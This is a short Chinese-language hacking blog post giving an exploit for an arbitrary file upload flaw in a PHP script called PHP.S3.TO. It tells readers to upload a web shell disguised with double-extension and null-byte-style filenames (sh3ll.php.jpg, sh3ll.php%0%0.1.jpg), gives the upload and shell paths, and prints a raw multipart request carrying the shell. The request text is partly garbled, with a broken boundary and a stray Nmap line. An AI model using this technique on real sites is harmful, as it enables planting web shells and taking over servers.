当前位置: iick's blog > 网站漏洞 > PHP.S3.TO 上传漏洞

PHP.S3.TO 上传漏洞

作者:hack1990 时间:12-09-01 阅读数:575人阅读

PHP S3上传漏洞

这个网页漏洞比较严重,可以直接获取shell,下面给出漏洞利用方法

漏洞信息:

 
可以任意上传PHP,TXT,JPG,PNG格式文件
change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg


漏洞利用演示:


利用:

 
hack1990.com/[dir]/up/upload.php
 
加载的文件 :
 
hack1990.com/[dir]/up/img/Sh3ll.php.jpg


漏洞核心代码:

 

114782935826962\r\nContent-Disposition: form-data;


name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358
26962\r\nContent-Disposition: form-data;name="upfile";
filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition:
form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data;
name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n
 

# Nmap Security Scanner 7.0

上一篇:Discuz X2.5后台最新拿webshell

下一篇:SpeedCMS任意文件下载读取漏洞

相关文章

发表评论